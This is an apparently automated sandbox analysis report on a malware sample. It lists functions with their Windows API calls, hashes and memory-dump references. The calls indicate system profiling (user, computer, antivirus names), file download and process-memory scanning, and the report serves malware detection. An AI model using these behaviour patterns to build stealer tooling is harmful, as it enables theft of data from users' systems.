                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                                                                                                                                          • String ID: void
                                                                                                                                                                                                                                                          • API String ID: 1480779885-3531332078
                                                                                                                                                                                                                                                          • Opcode ID: a19cd2b2135e7f62739908dd85b095d0d0cf9e19f61e8d6af701831b2c161fec
                                                                                                                                                                                                                                                          • Instruction ID: 9e73e11240fdecb417f8aaae6f4b1cbf4845c66ac2cdf3b0968c9fe624381b9a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a19cd2b2135e7f62739908dd85b095d0d0cf9e19f61e8d6af701831b2c161fec
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6115E71500249AFE71AEB68CC55BBD7BA0AF10340F044099F18B9B2FADB74AA41CB51
                                                                                                                                                                                                                                                          Function 00FF1786 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00FF1798
                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00FF17A3
                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00FF17AE
                                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00FF17B9
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00FF4275,?,Display Resolution: ,010158DC,00000000,User Name: ,010158CC,00000000,Computer Name: ,010158B8,AV: ,010158AC), ref: 00FF17C5
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,00FF4275,?,Display Resolution: ,010158DC,00000000,User Name: ,010158CC,00000000,Computer Name: ,010158B8,AV: ,010158AC,Install Date: ), ref: 00FF17CC
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF17DE
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                                                                          • String ID: %dx%d
                                                                                                                                                                                                                                                          • API String ID: 3940144428-2206825331
                                                                                                                                                                                                                                                          • Opcode ID: fbdd72528526ab1cd38bc175ff4b282f9a61b20de0bb4150650619bce4617570
                                                                                                                                                                                                                                                          • Instruction ID: b626987a855867119e2d657412cd2c8e56fd38fbcca8502aed8c3b1b510d7976
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbdd72528526ab1cd38bc175ff4b282f9a61b20de0bb4150650619bce4617570
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33F0AF72A01224BFD7302BA5BC4DDAB7EACFF467A2B004014F705D2144C6B54C008BE4
                                                                                                                                                                                                                                                          Function 00FE67DF Relevance: 13.6, APIs: 9, Instructions: 110networkfileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AD9
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4ADF
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AE5
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00FE4AF7
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00FE4AFF
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FE6828
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00FE6848
                                                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00FE6869
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00FE6884
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00FE68BA
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00FE68EA
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00FE6915
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00FE691C
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00FE6928
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2507841554-0
                                                                                                                                                                                                                                                          • Opcode ID: 083836f508b4e27feeb49895c3715de7368681c8cce89e4818c7fdf37b0984b6
                                                                                                                                                                                                                                                          • Instruction ID: 8fb729c09fe1a8ac9f756465ca6a3477eeaaa02a53de07d82c7dbd9e1df07e4e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 083836f508b4e27feeb49895c3715de7368681c8cce89e4818c7fdf37b0984b6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC412AB190016CAFDF309B21EC49BDA7BB9FF44354F1040A5BB09E2152D671AE85DFA4
                                                                                                                                                                                                                                                          Function 010060AD Relevance: 13.6, APIs: 9, Instructions: 64COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 010060D4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 010060E2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 010060ED
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 010060C1
                                                                                                                                                                                                                                                            • Part of subcall function 00FFD3DB: HeapFree.KERNEL32(00000000,00000000,?,00FFCC2D,00000000,0101A794,00FFCC74,00FEF100,?,?,00FFCD5E,0101A794,?,?,0100E6D8,0101A794), ref: 00FFD3F1
                                                                                                                                                                                                                                                            • Part of subcall function 00FFD3DB: GetLastError.KERNEL32(?,?,?,00FFCD5E,0101A794,?,?,0100E6D8,0101A794,?,?,?), ref: 00FFD403
                                                                                                                                                                                                                                                          • ___free_lc_time.LIBCMT ref: 0100610B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 01006116
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0100613B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 01006152
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 01006161
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lc_time
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3704779436-0
                                                                                                                                                                                                                                                          • Opcode ID: 9f5cc1072a080d2a93c850d1249c83dbb2a2d2e1fe2cb34a2dc1be2efc9d859f
                                                                                                                                                                                                                                                          • Instruction ID: fb77d415b20b02a6fe8ebdf82548f61f06f8d284fc9d8ac6dcde573387a2f88b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f5cc1072a080d2a93c850d1249c83dbb2a2d2e1fe2cb34a2dc1be2efc9d859f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4711CB711047099BFB726FACDC85AAA77F7EF01300F140879F38597592DA3994508B12
                                                                                                                                                                                                                                                          Function 00FEFDF7 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 00FEFE1C
                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 00FEFE48
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FEFE8B
                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00FEFFE1
                                                                                                                                                                                                                                                            • Part of subcall function 00FEF4D4: _memmove.LIBCMT ref: 00FEF4EE
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: OpenProcess_memmove_memset
                                                                                                                                                                                                                                                          • String ID: N0ZWFt
                                                                                                                                                                                                                                                          • API String ID: 2647191932-431618156
                                                                                                                                                                                                                                                          • Opcode ID: 7aa80bbbcb20bf56e96c3d07eae92b085819e4a7b41d0a6bb39ed9d741eff0cb
                                                                                                                                                                                                                                                          • Instruction ID: 2805143cd0c5c558e6a06fa8509dcfcdcab0c865fe739ae8c572561f0acccda9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7aa80bbbcb20bf56e96c3d07eae92b085819e4a7b41d0a6bb39ed9d741eff0cb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E5180B1D002689FDF30AF65CC85BEDB7B8AB45314F0041F9A208A7152DA756E88DF55
                                                                                                                                                                                                                                                          Function 00FEFBDF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,00FEFEAD,?,00000000,00000000,?,?), ref: 00FEFBFE
                                                                                                                                                                                                                                                          • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,00FEFEAD,?,00000000,00000000), ref: 00FEFC28
                                                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 00FEFC75
                                                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00FEFCCE
                                                                                                                                                                                                                                                          • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 00FEFD26
                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00FEFEAD,?,00000000,00000000,?,?), ref: 00FEFD37
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MemoryProcessQueryReadVirtual
                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                          • API String ID: 3835927879-2766056989
